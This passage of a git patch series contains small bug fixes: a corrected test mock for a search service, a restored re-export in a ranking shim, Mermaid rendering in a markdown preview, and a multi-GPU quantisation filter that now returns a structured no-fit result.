causing a TypeError on every run.

Fixes #2331
---
 tests/test_search_service_nondict_rows.py | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/tests/test_search_service_nondict_rows.py b/tests/test_search_service_nondict_rows.py
index 1e1b179..fc6ae3c 100644
--- a/tests/test_search_service_nondict_rows.py
+++ b/tests/test_search_service_nondict_rows.py
@@ -3,18 +3,18 @@ import asyncio
 import services.search.service as svc_mod
 from services.search.service import SearchService
 
-
 def test_search_skips_non_dict_results(monkeypatch):
     # comprehensive_web_search aggregates external provider + cache results;
     # a malformed row (string/None) made the old loop call r.get and crash,
     # losing the whole search.
-    async def fake_search(query, max_results=10, fetch_content=False):
-        return [
-            {"url": "https://a.com", "title": "A", "snippet": "x"},
+    def fake_search(query, max_pages=10, return_sources=False):
+        results = [
+            {"url": "https://a.com", "title": "A"},
             "junk-row",
             None,
-            {"url": "https://b.com", "title": "B", "snippet": "y"},
+            {"url": "https://b.com", "title": "B"},
         ]
+        return ("", results)
 
     monkeypatch.setattr(svc_mod, "comprehensive_web_search", fake_search)
     svc = SearchService()

From 93b3e108a6bf59e5de149a23dcd88f10698bd1be Mon Sep 17 00:00:00 2001
From: Wes Huber <wesleybaxterhuber@gmail.com>
Date: Thu, 4 Jun 2026 06:24:53 -0700
Subject: [PATCH 10/12] fix: re-export _SPORTS_HINT_RE from search ranking shim
 (#2273)

The compatibility re-export shim at src/search/ranking.py forgot
_SPORTS_HINT_RE, so tests importing src.search.ranking raised
AttributeError on the [src] parametrize variant.

Fixes #1995

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
---
 src/search/ranking.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/src/search/ranking.py b/src/search/ranking.py
index 62e3869..abe9a83 100644
--- a/src/search/ranking.py
+++ b/src/search/ranking.py
@@ -7,6 +7,7 @@ parallel copy; it now re-exports so the two cannot drift out of sync again.
 
 from services.search.ranking import (  # noqa: F401
     _AGE_FORMATS,
+    _SPORTS_HINT_RE,
     _utcnow_naive,
     rank_search_results,
     recency_score,

From e5d3f2211b8ef7dcea68b784d45b9371ee71f4bb Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Thu, 4 Jun 2026 09:25:15 -0400
Subject: [PATCH 11/12] fix(document): render Mermaid in markdown preview
 (#2415)

---
 static/js/document.js | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/static/js/document.js b/static/js/document.js
index 6696d60..1d38121 100644
--- a/static/js/document.js
+++ b/static/js/document.js
@@ -8554,6 +8554,9 @@ import * as Modals from './modalManager.js';
       if (window.hljs) {
         preview.querySelectorAll('pre code').forEach(b => window.hljs.highlightElement(b));
       }
+      if (markdownModule && markdownModule.renderMermaid) {
+        markdownModule.renderMermaid(preview);
+      }
       preview.style.display = '';
       wrap.style.display = 'none';
     } else {

From cf5c5118d869149ef239733ecdc8b300ed69666b Mon Sep 17 00:00:00 2001
From: raf <146721410+rafdog1222@users.noreply.github.com>
Date: Thu, 4 Jun 2026 21:25:36 +0800
Subject: [PATCH 12/12] fix(hwfit): return no_fit instead of None when
 target_quant is a GGUF tier on multi-GPU (#2375)

The multi-GPU GGUF filter at fit.py:380 returned None unconditionally
for Q*/IQ quants on 2+ GPU systems. When the caller explicitly passes
target_quant, they are asking 'what happens if I try this?' and expect
a structured no_fit response, not a silent None.

Fix: skip the filter when target_quant is explicitly provided so the
call falls through to the existing no_fit path.

Fixes #
---
 services/hwfit/fit.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/services/hwfit/fit.py b/services/hwfit/fit.py
index 3136d7b..9a45b53 100644
--- a/services/hwfit/fit.py
+++ b/services/hwfit/fit.py
@@ -377,7 +377,7 @@ def analyze_model(model, system, target_quant=None, scoring_use_case=None, targe
     # Multi-GPU filter: skip the row if the resolved quant is a GGUF tier
     # (Q*/IQ-prefixed) — vLLM/SGLang can't serve those, so showing them on
     # a 2+ GPU rig just clutters the list with unservable candidates.
-    if gpu_count >= 2 and quant_to_try and quant_to_try.upper().startswith(("Q2", "Q3", "Q4", "Q5", "Q6", "Q8", "IQ")):
+    if gpu_count >= 2 and quant_to_try and not target_quant and quant_to_try.upper().startswith(("Q2", "Q3", "Q4", "Q5", "Q6", "Q8", "IQ")):
         return None
 
     result = _try_quant_at(model, quant_to_try, ctx, effective_vram, 0 if native_gpu_only else eff_ram)